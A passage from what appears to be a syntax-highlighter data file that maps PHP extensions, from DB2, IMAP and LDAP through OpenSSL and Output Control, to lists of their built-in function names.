'db2_columns', 'db2_commit', 'db2_conn_error', 'db2_conn_errormsg', 'db2_connect', 'db2_cursor_type', 'db2_escape_string', 'db2_exec', 'db2_execute', 'db2_fetch_array', 'db2_fetch_assoc', 'db2_fetch_both', 'db2_fetch_object', 'db2_fetch_row', 'db2_field_display_size', 'db2_field_name', 'db2_field_num', 'db2_field_precision', 'db2_field_scale', 'db2_field_type', 'db2_field_width', 'db2_foreign_keys', 'db2_free_result', 'db2_free_stmt', 'db2_get_option', 'db2_last_insert_id', 'db2_lob_read', 'db2_next_result', 'db2_num_fields', 'db2_num_rows', 'db2_pclose', 'db2_pconnect', 
'db2_prepare', 'db2_primary_keys', 'db2_procedure_columns', 'db2_procedures', 'db2_result', 'db2_rollback', 'db2_server_info', 'db2_set_option', 'db2_special_columns', 'db2_statistics', 'db2_stmt_error', 'db2_stmt_errormsg', 'db2_table_privileges', 'db2_tables'], 'ID3': ['id3_get_frame_long_name', 'id3_get_frame_short_name', 'id3_get_genre_id', 'id3_get_genre_list', 'id3_get_genre_name', 'id3_get_tag', 'id3_get_version', 'id3_remove_tag', 'id3_set_tag'], 'IDN': ['grapheme_substr', 'idn_to_ascii', 'idn_to_unicode', 'idn_to_utf8'], 'IIS': ['iis_add_server', 'iis_get_dir_security', 'iis_get_script_map', 'iis_get_server_by_comment', 'iis_get_server_by_path', 'iis_get_server_rights', 'iis_get_service_state', 'iis_remove_server', 'iis_set_app_settings', 'iis_set_dir_security', 'iis_set_script_map', 'iis_set_server_rights', 'iis_start_server', 'iis_start_service', 'iis_stop_server', 'iis_stop_service'], 'IMAP': ['imap_8bit', 'imap_alerts', 'imap_append', 'imap_base64', 'imap_binary', 'imap_body', 'imap_bodystruct', 'imap_check', 'imap_clearflag_full', 'imap_close', 'imap_create', 'imap_createmailbox', 'imap_delete', 'imap_deletemailbox', 'imap_errors', 'imap_expunge', 'imap_fetch_overview', 'imap_fetchbody', 'imap_fetchheader', 'imap_fetchmime', 'imap_fetchstructure', 'imap_fetchtext', 'imap_gc', 'imap_get_quota', 'imap_get_quotaroot', 'imap_getacl', 'imap_getmailboxes', 'imap_getsubscribed', 'imap_header', 'imap_headerinfo', 'imap_headers', 'imap_last_error', 'imap_list', 'imap_listmailbox', 'imap_listscan', 'imap_listsubscribed', 'imap_lsub', 'imap_mail_compose', 'imap_mail_copy', 'imap_mail_move', 'imap_mail', 'imap_mailboxmsginfo', 'imap_mime_header_decode', 'imap_msgno', 'imap_num_msg', 'imap_num_recent', 'imap_open', 'imap_ping', 'imap_qprint', 'imap_rename', 'imap_renamemailbox', 'imap_reopen', 'imap_rfc822_parse_adrlist', 'imap_rfc822_parse_headers', 'imap_rfc822_write_address', 'imap_savebody', 'imap_scan', 'imap_scanmailbox', 'imap_search', 'imap_set_quota', 'imap_setacl', 'imap_setflag_full', 'imap_sort', 'imap_status', 'imap_subscribe', 'imap_thread', 'imap_timeout', 'imap_uid', 'imap_undelete', 'imap_unsubscribe', 'imap_utf7_decode', 'imap_utf7_encode', 'imap_utf8'], 'Informix': ['ifx_affected_rows', 'ifx_blobinfile_mode', 'ifx_byteasvarchar', 'ifx_close', 'ifx_connect', 'ifx_copy_blob', 'ifx_create_blob', 'ifx_create_char', 'ifx_do', 'ifx_error', 'ifx_errormsg', 'ifx_fetch_row', 'ifx_fieldproperties', 'ifx_fieldtypes', 'ifx_free_blob', 'ifx_free_char', 'ifx_free_result', 'ifx_get_blob', 'ifx_get_char', 'ifx_getsqlca', 'ifx_htmltbl_result', 'ifx_nullformat', 'ifx_num_fields', 'ifx_num_rows', 'ifx_pconnect', 'ifx_prepare', 'ifx_query', 'ifx_textasvarchar', 'ifx_update_blob', 'ifx_update_char', 'ifxus_close_slob', 'ifxus_create_slob', 'ifxus_free_slob', 'ifxus_open_slob', 'ifxus_read_slob', 'ifxus_seek_slob', 'ifxus_tell_slob', 'ifxus_write_slob'], 'Ingres': ['ingres_autocommit_state', 'ingres_autocommit', 'ingres_charset', 'ingres_close', 'ingres_commit', 'ingres_connect', 'ingres_cursor', 'ingres_errno', 'ingres_error', 'ingres_errsqlstate', 'ingres_escape_string', 'ingres_execute', 'ingres_fetch_array', 'ingres_fetch_assoc', 'ingres_fetch_object', 'ingres_fetch_proc_return', 'ingres_fetch_row', 'ingres_field_length', 'ingres_field_name', 'ingres_field_nullable', 'ingres_field_precision', 'ingres_field_scale', 'ingres_field_type', 'ingres_free_result', 'ingres_next_error', 'ingres_num_fields', 'ingres_num_rows', 'ingres_pconnect', 'ingres_prepare', 'ingres_query', 
'ingres_result_seek', 'ingres_rollback', 'ingres_set_environment', 'ingres_unbuffered_query'], 'Inotify': ['inotify_add_watch', 'inotify_init', 'inotify_queue_len', 'inotify_read', 'inotify_rm_watch'], 'JSON': ['json_decode', 'json_encode', 'json_last_error_msg', 'json_last_error'], 'Java': ['java_last_exception_clear', 'java_last_exception_get'], 'Judy': ['judy_type', 'judy_version'], 'KADM5': ['kadm5_chpass_principal', 'kadm5_create_principal', 'kadm5_delete_principal', 'kadm5_destroy', 'kadm5_flush', 'kadm5_get_policies', 'kadm5_get_principal', 'kadm5_get_principals', 'kadm5_init_with_password', 'kadm5_modify_principal'], 'LDAP': ['ldap_8859_to_t61', 'ldap_add', 'ldap_bind', 'ldap_close', 'ldap_compare', 'ldap_connect', 'ldap_control_paged_result_response', 'ldap_control_paged_result', 'ldap_count_entries', 'ldap_delete', 'ldap_dn2ufn', 'ldap_err2str', 'ldap_errno', 'ldap_error', 'ldap_explode_dn', 'ldap_first_attribute', 'ldap_first_entry', 'ldap_first_reference', 'ldap_free_result', 'ldap_get_attributes', 'ldap_get_dn', 'ldap_get_entries', 'ldap_get_option', 'ldap_get_values_len', 'ldap_get_values', 'ldap_list', 'ldap_mod_add', 'ldap_mod_del', 'ldap_mod_replace', 'ldap_modify', 'ldap_next_attribute', 'ldap_next_entry', 'ldap_next_reference', 'ldap_parse_reference', 'ldap_parse_result', 'ldap_read', 'ldap_rename', 'ldap_sasl_bind', 'ldap_search', 'ldap_set_option', 'ldap_set_rebind_proc', 'ldap_sort', 'ldap_start_tls', 'ldap_t61_to_8859', 'ldap_unbind'], 'LZF': ['lzf_compress', 'lzf_decompress', 'lzf_optimized_for'], 'Libevent': ['event_add', 'event_base_free', 'event_base_loop', 'event_base_loopbreak', 'event_base_loopexit', 'event_base_new', 'event_base_priority_init', 'event_base_set', 'event_buffer_base_set', 'event_buffer_disable', 'event_buffer_enable', 'event_buffer_fd_set', 'event_buffer_free', 'event_buffer_new', 'event_buffer_priority_set', 'event_buffer_read', 'event_buffer_set_callback', 'event_buffer_timeout_set', 'event_buffer_watermark_set', 'event_buffer_write', 'event_del', 'event_free', 'event_new', 'event_set'], 'Lotus Notes': ['notes_body', 'notes_copy_db', 'notes_create_db', 'notes_create_note', 'notes_drop_db', 'notes_find_note', 'notes_header_info', 'notes_list_msgs', 'notes_mark_read', 'notes_mark_unread', 'notes_nav_create', 'notes_search', 'notes_unread', 'notes_version'], 'MCVE': ['m_checkstatus', 'm_completeauthorizations', 'm_connect', 'm_connectionerror', 'm_deletetrans', 'm_destroyconn', 'm_destroyengine', 'm_getcell', 'm_getcellbynum', 'm_getcommadelimited', 'm_getheader', 'm_initconn', 'm_initengine', 'm_iscommadelimited', 'm_maxconntimeout', 'm_monitor', 'm_numcolumns', 'm_numrows', 'm_parsecommadelimited', 'm_responsekeys', 'm_responseparam', 'm_returnstatus', 'm_setblocking', 'm_setdropfile', 'm_setip', 'm_setssl_cafile', 'm_setssl_files', 'm_setssl', 'm_settimeout', 'm_sslcert_gen_hash', 'm_transactionssent', 'm_transinqueue', 'm_transkeyval', 'm_transnew', 'm_transsend', 'm_uwait', 'm_validateidentifier', 'm_verifyconnection', 'm_verifysslcert'], 'Mail': ['ezmlm_hash', 'mail'], 'Mailparse': ['mailparse_determine_best_xfer_encoding', 'mailparse_msg_create', 'mailparse_msg_extract_part_file', 'mailparse_msg_extract_part', 'mailparse_msg_extract_whole_part_file', 'mailparse_msg_free', 'mailparse_msg_get_part_data', 'mailparse_msg_get_part', 'mailparse_msg_get_structure', 'mailparse_msg_parse_file', 'mailparse_msg_parse', 'mailparse_rfc822_parse_addresses', 'mailparse_stream_encode', 'mailparse_uudecode_all'], 'Math': ['abs', 'acos', 'acosh', 'asin', 
'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'], 'MaxDB': ['maxdb_affected_rows', 'maxdb_autocommit', 'maxdb_bind_param', 'maxdb_bind_result', 'maxdb_change_user', 'maxdb_character_set_name', 'maxdb_client_encoding', 'maxdb_close_long_data', 'maxdb_close', 'maxdb_commit', 'maxdb_connect_errno', 'maxdb_connect_error', 'maxdb_connect', 'maxdb_data_seek', 'maxdb_debug', 'maxdb_disable_reads_from_master', 'maxdb_disable_rpl_parse', 'maxdb_dump_debug_info', 'maxdb_embedded_connect', 'maxdb_enable_reads_from_master', 'maxdb_enable_rpl_parse', 'maxdb_errno', 'maxdb_error', 'maxdb_escape_string', 'maxdb_execute', 'maxdb_fetch_array', 'maxdb_fetch_assoc', 'maxdb_fetch_field_direct', 'maxdb_fetch_field', 'maxdb_fetch_fields', 'maxdb_fetch_lengths', 'maxdb_fetch_object', 'maxdb_fetch_row', 'maxdb_fetch', 'maxdb_field_count', 'maxdb_field_seek', 'maxdb_field_tell', 'maxdb_free_result', 'maxdb_get_client_info', 'maxdb_get_client_version', 'maxdb_get_host_info', 'maxdb_get_metadata', 'maxdb_get_proto_info', 'maxdb_get_server_info', 'maxdb_get_server_version', 'maxdb_info', 'maxdb_init', 'maxdb_insert_id', 'maxdb_kill', 'maxdb_master_query', 'maxdb_more_results', 'maxdb_multi_query', 'maxdb_next_result', 'maxdb_num_fields', 'maxdb_num_rows', 'maxdb_options', 'maxdb_param_count', 'maxdb_ping', 'maxdb_prepare', 'maxdb_query', 'maxdb_real_connect', 'maxdb_real_escape_string', 'maxdb_real_query', 'maxdb_report', 'maxdb_rollback', 'maxdb_rpl_parse_enabled', 'maxdb_rpl_probe', 'maxdb_rpl_query_type', 'maxdb_select_db', 'maxdb_send_long_data', 'maxdb_send_query', 'maxdb_server_end', 'maxdb_server_init', 'maxdb_set_opt', 'maxdb_sqlstate', 'maxdb_ssl_set', 'maxdb_stat', 'maxdb_stmt_affected_rows', 'maxdb_stmt_bind_param', 'maxdb_stmt_bind_result', 'maxdb_stmt_close_long_data', 'maxdb_stmt_close', 'maxdb_stmt_data_seek', 'maxdb_stmt_errno', 'maxdb_stmt_error', 'maxdb_stmt_execute', 'maxdb_stmt_fetch', 'maxdb_stmt_free_result', 'maxdb_stmt_init', 'maxdb_stmt_num_rows', 'maxdb_stmt_param_count', 'maxdb_stmt_prepare', 'maxdb_stmt_reset', 'maxdb_stmt_result_metadata', 'maxdb_stmt_send_long_data', 'maxdb_stmt_sqlstate', 'maxdb_stmt_store_result', 'maxdb_store_result', 'maxdb_thread_id', 'maxdb_thread_safe', 'maxdb_use_result', 'maxdb_warning_count'], 'Mcrypt': ['mcrypt_cbc', 'mcrypt_cfb', 'mcrypt_create_iv', 'mcrypt_decrypt', 'mcrypt_ecb', 'mcrypt_enc_get_algorithms_name', 'mcrypt_enc_get_block_size', 'mcrypt_enc_get_iv_size', 'mcrypt_enc_get_key_size', 'mcrypt_enc_get_modes_name', 'mcrypt_enc_get_supported_key_sizes', 'mcrypt_enc_is_block_algorithm_mode', 'mcrypt_enc_is_block_algorithm', 'mcrypt_enc_is_block_mode', 'mcrypt_enc_self_test', 'mcrypt_encrypt', 'mcrypt_generic_deinit', 'mcrypt_generic_end', 'mcrypt_generic_init', 'mcrypt_generic', 'mcrypt_get_block_size', 'mcrypt_get_cipher_name', 'mcrypt_get_iv_size', 'mcrypt_get_key_size', 'mcrypt_list_algorithms', 'mcrypt_list_modes', 'mcrypt_module_close', 'mcrypt_module_get_algo_block_size', 'mcrypt_module_get_algo_key_size', 'mcrypt_module_get_supported_key_sizes', 'mcrypt_module_is_block_algorithm_mode', 'mcrypt_module_is_block_algorithm', 'mcrypt_module_is_block_mode', 'mcrypt_module_open', 
'mcrypt_module_self_test', 'mcrypt_ofb', 'mdecrypt_generic'], 'Memcache': ['memcache_debug'], 'Mhash': ['mhash_count', 'mhash_get_block_size', 'mhash_get_hash_name', 'mhash_keygen_s2k', 'mhash'], 'Ming': ['ming_keypress', 'ming_setcubicthreshold', 'ming_setscale', 'ming_setswfcompression', 'ming_useconstants', 'ming_useswfversion'], 'Misc.': ['connection_aborted', 'connection_status', 'connection_timeout', 'constant', 'define', 'defined', 'die', 'eval', 'exit', 'get_browser', '__halt_compiler', 'highlight_file', 'highlight_string', 'ignore_user_abort', 'pack', 'php_check_syntax', 'php_strip_whitespace', 'show_source', 'sleep', 'sys_getloadavg', 'time_nanosleep', 'time_sleep_until', 'uniqid', 'unpack', 'usleep'], 'Mongo': ['bson_decode', 'bson_encode'], 'Msession': ['msession_connect', 'msession_count', 'msession_create', 'msession_destroy', 'msession_disconnect', 'msession_find', 'msession_get_array', 'msession_get_data', 'msession_get', 'msession_inc', 'msession_list', 'msession_listvar', 'msession_lock', 'msession_plugin', 'msession_randstr', 'msession_set_array', 'msession_set_data', 'msession_set', 'msession_timeout', 'msession_uniq', 'msession_unlock'], 'Mssql': ['mssql_bind', 'mssql_close', 'mssql_connect', 'mssql_data_seek', 'mssql_execute', 'mssql_fetch_array', 'mssql_fetch_assoc', 'mssql_fetch_batch', 'mssql_fetch_field', 'mssql_fetch_object', 'mssql_fetch_row', 'mssql_field_length', 'mssql_field_name', 'mssql_field_seek', 'mssql_field_type', 'mssql_free_result', 'mssql_free_statement', 'mssql_get_last_message', 'mssql_guid_string', 'mssql_init', 'mssql_min_error_severity', 'mssql_min_message_severity', 'mssql_next_result', 'mssql_num_fields', 'mssql_num_rows', 'mssql_pconnect', 'mssql_query', 'mssql_result', 'mssql_rows_affected', 'mssql_select_db'], 'Multibyte String': ['mb_check_encoding', 'mb_convert_case', 'mb_convert_encoding', 'mb_convert_kana', 'mb_convert_variables', 'mb_decode_mimeheader', 'mb_decode_numericentity', 'mb_detect_encoding', 'mb_detect_order', 'mb_encode_mimeheader', 'mb_encode_numericentity', 'mb_encoding_aliases', 'mb_ereg_match', 'mb_ereg_replace_callback', 'mb_ereg_replace', 'mb_ereg_search_getpos', 'mb_ereg_search_getregs', 'mb_ereg_search_init', 'mb_ereg_search_pos', 'mb_ereg_search_regs', 'mb_ereg_search_setpos', 'mb_ereg_search', 'mb_ereg', 'mb_eregi_replace', 'mb_eregi', 'mb_get_info', 'mb_http_input', 'mb_http_output', 'mb_internal_encoding', 'mb_language', 'mb_list_encodings', 'mb_output_handler', 'mb_parse_str', 'mb_preferred_mime_name', 'mb_regex_encoding', 'mb_regex_set_options', 'mb_send_mail', 'mb_split', 'mb_strcut', 'mb_strimwidth', 'mb_stripos', 'mb_stristr', 'mb_strlen', 'mb_strpos', 'mb_strrchr', 'mb_strrichr', 'mb_strripos', 'mb_strrpos', 'mb_strstr', 'mb_strtolower', 'mb_strtoupper', 'mb_strwidth', 'mb_substitute_character', 'mb_substr_count', 'mb_substr'], 'MySQL': ['mysql_affected_rows', 'mysql_client_encoding', 'mysql_close', 'mysql_connect', 'mysql_create_db', 'mysql_data_seek', 'mysql_db_name', 'mysql_db_query', 'mysql_drop_db', 'mysql_errno', 'mysql_error', 'mysql_escape_string', 'mysql_fetch_array', 'mysql_fetch_assoc', 'mysql_fetch_field', 'mysql_fetch_lengths', 'mysql_fetch_object', 'mysql_fetch_row', 'mysql_field_flags', 'mysql_field_len', 'mysql_field_name', 'mysql_field_seek', 'mysql_field_table', 'mysql_field_type', 'mysql_free_result', 'mysql_get_client_info', 'mysql_get_host_info', 'mysql_get_proto_info', 'mysql_get_server_info', 'mysql_info', 'mysql_insert_id', 'mysql_list_dbs', 'mysql_list_fields', 
'mysql_list_processes', 'mysql_list_tables', 'mysql_num_fields', 'mysql_num_rows', 'mysql_pconnect', 'mysql_ping', 'mysql_query', 'mysql_real_escape_string', 'mysql_result', 'mysql_select_db', 'mysql_set_charset', 'mysql_stat', 'mysql_tablename', 'mysql_thread_id', 'mysql_unbuffered_query'], 'Mysqlnd_memcache': ['mysqlnd_memcache_get_config', 'mysqlnd_memcache_set'], 'Mysqlnd_ms': ['mysqlnd_ms_dump_servers', 'mysqlnd_ms_fabric_select_global', 'mysqlnd_ms_fabric_select_shard', 'mysqlnd_ms_get_last_gtid', 'mysqlnd_ms_get_last_used_connection', 'mysqlnd_ms_get_stats', 'mysqlnd_ms_match_wild', 'mysqlnd_ms_query_is_select', 'mysqlnd_ms_set_qos', 'mysqlnd_ms_set_user_pick_server'], 'Mysqlnd_uh': ['mysqlnd_uh_convert_to_mysqlnd', 'mysqlnd_uh_set_connection_proxy', 'mysqlnd_uh_set_statement_proxy'], 'NSAPI': ['nsapi_request_headers', 'nsapi_response_headers', 'nsapi_virtual'], 'Ncurses': ['ncurses_addch', 'ncurses_addchnstr', 'ncurses_addchstr', 'ncurses_addnstr', 'ncurses_addstr', 'ncurses_assume_default_colors', 'ncurses_attroff', 'ncurses_attron', 'ncurses_attrset', 'ncurses_baudrate', 'ncurses_beep', 'ncurses_bkgd', 'ncurses_bkgdset', 'ncurses_border', 'ncurses_bottom_panel', 'ncurses_can_change_color', 'ncurses_cbreak', 'ncurses_clear', 'ncurses_clrtobot', 'ncurses_clrtoeol', 'ncurses_color_content', 'ncurses_color_set', 'ncurses_curs_set', 'ncurses_def_prog_mode', 'ncurses_def_shell_mode', 'ncurses_define_key', 'ncurses_del_panel', 'ncurses_delay_output', 'ncurses_delch', 'ncurses_deleteln', 'ncurses_delwin', 'ncurses_doupdate', 'ncurses_echo', 'ncurses_echochar', 'ncurses_end', 'ncurses_erase', 'ncurses_erasechar', 'ncurses_filter', 'ncurses_flash', 'ncurses_flushinp', 'ncurses_getch', 'ncurses_getmaxyx', 'ncurses_getmouse', 'ncurses_getyx', 'ncurses_halfdelay', 'ncurses_has_colors', 'ncurses_has_ic', 'ncurses_has_il', 'ncurses_has_key', 'ncurses_hide_panel', 'ncurses_hline', 'ncurses_inch', 'ncurses_init_color', 'ncurses_init_pair', 'ncurses_init', 'ncurses_insch', 'ncurses_insdelln', 'ncurses_insertln', 'ncurses_insstr', 'ncurses_instr', 'ncurses_isendwin', 'ncurses_keyok', 'ncurses_keypad', 'ncurses_killchar', 'ncurses_longname', 'ncurses_meta', 'ncurses_mouse_trafo', 'ncurses_mouseinterval', 'ncurses_mousemask', 'ncurses_move_panel', 'ncurses_move', 'ncurses_mvaddch', 'ncurses_mvaddchnstr', 'ncurses_mvaddchstr', 'ncurses_mvaddnstr', 'ncurses_mvaddstr', 'ncurses_mvcur', 'ncurses_mvdelch', 'ncurses_mvgetch', 'ncurses_mvhline', 'ncurses_mvinch', 'ncurses_mvvline', 'ncurses_mvwaddstr', 'ncurses_napms', 'ncurses_new_panel', 'ncurses_newpad', 'ncurses_newwin', 'ncurses_nl', 'ncurses_nocbreak', 'ncurses_noecho', 'ncurses_nonl', 'ncurses_noqiflush', 'ncurses_noraw', 'ncurses_pair_content', 'ncurses_panel_above', 'ncurses_panel_below', 'ncurses_panel_window', 'ncurses_pnoutrefresh', 'ncurses_prefresh', 'ncurses_putp', 'ncurses_qiflush', 'ncurses_raw', 'ncurses_refresh', 'ncurses_replace_panel', 'ncurses_reset_prog_mode', 'ncurses_reset_shell_mode', 'ncurses_resetty', 'ncurses_savetty', 'ncurses_scr_dump', 'ncurses_scr_init', 'ncurses_scr_restore', 'ncurses_scr_set', 'ncurses_scrl', 'ncurses_show_panel', 'ncurses_slk_attr', 'ncurses_slk_attroff', 'ncurses_slk_attron', 'ncurses_slk_attrset', 'ncurses_slk_clear', 'ncurses_slk_color', 'ncurses_slk_init', 'ncurses_slk_noutrefresh', 'ncurses_slk_refresh', 'ncurses_slk_restore', 'ncurses_slk_set', 'ncurses_slk_touch', 'ncurses_standend', 'ncurses_standout', 'ncurses_start_color', 'ncurses_termattrs', 'ncurses_termname', 'ncurses_timeout', 
'ncurses_top_panel', 'ncurses_typeahead', 'ncurses_ungetch', 'ncurses_ungetmouse', 'ncurses_update_panels', 'ncurses_use_default_colors', 'ncurses_use_env', 'ncurses_use_extended_names', 'ncurses_vidattr', 'ncurses_vline', 'ncurses_waddch', 'ncurses_waddstr', 'ncurses_wattroff', 'ncurses_wattron', 'ncurses_wattrset', 'ncurses_wborder', 'ncurses_wclear', 'ncurses_wcolor_set', 'ncurses_werase', 'ncurses_wgetch', 'ncurses_whline', 'ncurses_wmouse_trafo', 'ncurses_wmove', 'ncurses_wnoutrefresh', 'ncurses_wrefresh', 'ncurses_wstandend', 'ncurses_wstandout', 'ncurses_wvline'], 'Network': ['checkdnsrr', 'closelog', 'define_syslog_variables', 'dns_check_record', 'dns_get_mx', 'dns_get_record', 'fsockopen', 'gethostbyaddr', 'gethostbyname', 'gethostbynamel', 'gethostname', 'getmxrr', 'getprotobyname', 'getprotobynumber', 'getservbyname', 'getservbyport', 'header_register_callback', 'header_remove', 'header', 'headers_list', 'headers_sent', 'http_response_code', 'inet_ntop', 'inet_pton', 'ip2long', 'long2ip', 'openlog', 'pfsockopen', 'setcookie', 'setrawcookie', 'socket_get_status', 'socket_set_blocking', 'socket_set_timeout', 'syslog'], 'Newt': ['newt_bell', 'newt_button_bar', 'newt_button', 'newt_centered_window', 'newt_checkbox_get_value', 'newt_checkbox_set_flags', 'newt_checkbox_set_value', 'newt_checkbox_tree_add_item', 'newt_checkbox_tree_find_item', 'newt_checkbox_tree_get_current', 'newt_checkbox_tree_get_entry_value', 'newt_checkbox_tree_get_multi_selection', 'newt_checkbox_tree_get_selection', 'newt_checkbox_tree_multi', 'newt_checkbox_tree_set_current', 'newt_checkbox_tree_set_entry_value', 'newt_checkbox_tree_set_entry', 'newt_checkbox_tree_set_width', 'newt_checkbox_tree', 'newt_checkbox', 'newt_clear_key_buffer', 'newt_cls', 'newt_compact_button', 'newt_component_add_callback', 'newt_component_takes_focus', 'newt_create_grid', 'newt_cursor_off', 'newt_cursor_on', 'newt_delay', 'newt_draw_form', 'newt_draw_root_text', 'newt_entry_get_value', 'newt_entry_set_filter', 'newt_entry_set_flags', 'newt_entry_set', 'newt_entry', 'newt_finished', 'newt_form_add_component', 'newt_form_add_components', 'newt_form_add_hot_key', 'newt_form_destroy', 'newt_form_get_current', 'newt_form_run', 'newt_form_set_background', 'newt_form_set_height', 'newt_form_set_size', 'newt_form_set_timer', 'newt_form_set_width', 'newt_form_watch_fd', 'newt_form', 'newt_get_screen_size', 'newt_grid_add_components_to_form', 'newt_grid_basic_window', 'newt_grid_free', 'newt_grid_get_size', 'newt_grid_h_close_stacked', 'newt_grid_h_stacked', 'newt_grid_place', 'newt_grid_set_field', 'newt_grid_simple_window', 'newt_grid_v_close_stacked', 'newt_grid_v_stacked', 'newt_grid_wrapped_window_at', 'newt_grid_wrapped_window', 'newt_init', 'newt_label_set_text', 'newt_label', 'newt_listbox_append_entry', 'newt_listbox_clear_selection', 'newt_listbox_clear', 'newt_listbox_delete_entry', 'newt_listbox_get_current', 'newt_listbox_get_selection', 'newt_listbox_insert_entry', 'newt_listbox_item_count', 'newt_listbox_select_item', 'newt_listbox_set_current_by_key', 'newt_listbox_set_current', 'newt_listbox_set_data', 'newt_listbox_set_entry', 'newt_listbox_set_width', 'newt_listbox', 'newt_listitem_get_data', 'newt_listitem_set', 'newt_listitem', 'newt_open_window', 'newt_pop_help_line', 'newt_pop_window', 'newt_push_help_line', 'newt_radio_get_current', 'newt_radiobutton', 'newt_redraw_help_line', 'newt_reflow_text', 'newt_refresh', 'newt_resize_screen', 'newt_resume', 'newt_run_form', 'newt_scale_set', 'newt_scale', 
'newt_scrollbar_set', 'newt_set_help_callback', 'newt_set_suspend_callback', 'newt_suspend', 'newt_textbox_get_num_lines', 'newt_textbox_reflowed', 'newt_textbox_set_height', 'newt_textbox_set_text', 'newt_textbox', 'newt_vertical_scrollbar', 'newt_wait_for_key', 'newt_win_choice', 'newt_win_entries', 'newt_win_menu', 'newt_win_message', 'newt_win_messagev', 'newt_win_ternary'], 'OAuth': ['oauth_get_sbs', 'oauth_urlencode'], 'OCI8': ['oci_bind_array_by_name', 'oci_bind_by_name', 'oci_cancel', 'oci_client_version', 'oci_close', 'oci_commit', 'oci_connect', 'oci_define_by_name', 'oci_error', 'oci_execute', 'oci_fetch_all', 'oci_fetch_array', 'oci_fetch_assoc', 'oci_fetch_object', 'oci_fetch_row', 'oci_fetch', 'oci_field_is_null', 'oci_field_name', 'oci_field_precision', 'oci_field_scale', 'oci_field_size', 'oci_field_type_raw', 'oci_field_type', 'oci_free_descriptor', 'oci_free_statement', 'oci_get_implicit_resultset', 'oci_internal_debug', 'oci_lob_copy', 'oci_lob_is_equal', 'oci_new_collection', 'oci_new_connect', 'oci_new_cursor', 'oci_new_descriptor', 'oci_num_fields', 'oci_num_rows', 'oci_parse', 'oci_password_change', 'oci_pconnect', 'oci_result', 'oci_rollback', 'oci_server_version', 'oci_set_action', 'oci_set_client_identifier', 'oci_set_client_info', 'oci_set_edition', 'oci_set_module_name', 'oci_set_prefetch', 'oci_statement_type'], 'ODBC': ['odbc_autocommit', 'odbc_binmode', 'odbc_close_all', 'odbc_close', 'odbc_columnprivileges', 'odbc_columns', 'odbc_commit', 'odbc_connect', 'odbc_cursor', 'odbc_data_source', 'odbc_do', 'odbc_error', 'odbc_errormsg', 'odbc_exec', 'odbc_execute', 'odbc_fetch_array', 'odbc_fetch_into', 'odbc_fetch_object', 'odbc_fetch_row', 'odbc_field_len', 'odbc_field_name', 'odbc_field_num', 'odbc_field_precision', 'odbc_field_scale', 'odbc_field_type', 'odbc_foreignkeys', 'odbc_free_result', 'odbc_gettypeinfo', 'odbc_longreadlen', 'odbc_next_result', 'odbc_num_fields', 'odbc_num_rows', 'odbc_pconnect', 'odbc_prepare', 'odbc_primarykeys', 'odbc_procedurecolumns', 'odbc_procedures', 'odbc_result_all', 'odbc_result', 'odbc_rollback', 'odbc_setoption', 'odbc_specialcolumns', 'odbc_statistics', 'odbc_tableprivileges', 'odbc_tables'], 'OPcache': ['opcache_compile_file', 'opcache_get_configuration', 'opcache_get_status', 'opcache_invalidate', 'opcache_reset'], 'Object Aggregation': ['aggregate_info', 'aggregate_methods_by_list', 'aggregate_methods_by_regexp', 'aggregate_methods', 'aggregate_properties_by_list', 'aggregate_properties_by_regexp', 'aggregate_properties', 'aggregate', 'aggregation_info', 'deaggregate'], 'OpenAL': ['openal_buffer_create', 'openal_buffer_data', 'openal_buffer_destroy', 'openal_buffer_get', 'openal_buffer_loadwav', 'openal_context_create', 'openal_context_current', 'openal_context_destroy', 'openal_context_process', 'openal_context_suspend', 'openal_device_close', 'openal_device_open', 'openal_listener_get', 'openal_listener_set', 'openal_source_create', 'openal_source_destroy', 'openal_source_get', 'openal_source_pause', 'openal_source_play', 'openal_source_rewind', 'openal_source_set', 'openal_source_stop', 'openal_stream'], 'OpenSSL': ['openssl_cipher_iv_length', 'openssl_csr_export_to_file', 'openssl_csr_export', 'openssl_csr_get_public_key', 'openssl_csr_get_subject', 'openssl_csr_new', 'openssl_csr_sign', 'openssl_decrypt', 'openssl_dh_compute_key', 'openssl_digest', 'openssl_encrypt', 'openssl_error_string', 'openssl_free_key', 'openssl_get_cipher_methods', 'openssl_get_md_methods', 'openssl_get_privatekey', 'openssl_get_publickey', 
'openssl_open', 'openssl_pbkdf2', 'openssl_pkcs12_export_to_file', 'openssl_pkcs12_export', 'openssl_pkcs12_read', 'openssl_pkcs7_decrypt', 'openssl_pkcs7_encrypt', 'openssl_pkcs7_sign', 'openssl_pkcs7_verify', 'openssl_pkey_export_to_file', 'openssl_pkey_export', 'openssl_pkey_free', 'openssl_pkey_get_details', 'openssl_pkey_get_private', 'openssl_pkey_get_public', 'openssl_pkey_new', 'openssl_private_decrypt', 'openssl_private_encrypt', 'openssl_public_decrypt', 'openssl_public_encrypt', 'openssl_random_pseudo_bytes', 'openssl_seal', 'openssl_sign', 'openssl_spki_export_challenge', 'openssl_spki_export', 'openssl_spki_new', 'openssl_spki_verify', 'openssl_verify', 'openssl_x509_check_private_key', 'openssl_x509_checkpurpose', 'openssl_x509_export_to_file', 'openssl_x509_export', 'openssl_x509_free', 'openssl_x509_parse', 'openssl_x509_read'], 'Output Control': ['flush', 'ob_clean', 'ob_end_clean', 'ob_end_flush', 'ob_flush', 'ob_get_clean', 'ob_get_contents', 'ob_get_flush', 'ob_get_length', 'ob_get_level', 'ob_get_status', 'ob_gzhandler', 'ob_implicit_flush', 'ob_list_handlers', 'ob_start', 'output_add_rewrite_var', 'output_reset_rewrite_vars'], 'Ovrimos SQL': ['ovrimos_close', 'ovrimos_commit', 'ovrimos_connect', 'ovrimos_cursor', 'ovrimos_exec', 'ovrimos_execute', 'ovrimos_fetch_into', 'ovrimos_fetch_row', 'ovrimos_field_len', 'ovrimos_field_name', 'ovrimos_field_num', 'ovrimos_field_type', 'ovrimos_free_result', 'ovrimos_longreadlen', 'ovrimos_num_fields', 'ovrimos_num_rows', 'ovrimos_prepare', 'ovrimos_result_all', 'ovrimos_result', 'ovrimos_rollback'], 'PCNTL': ['pcntl_alarm', 'pcntl_errno', 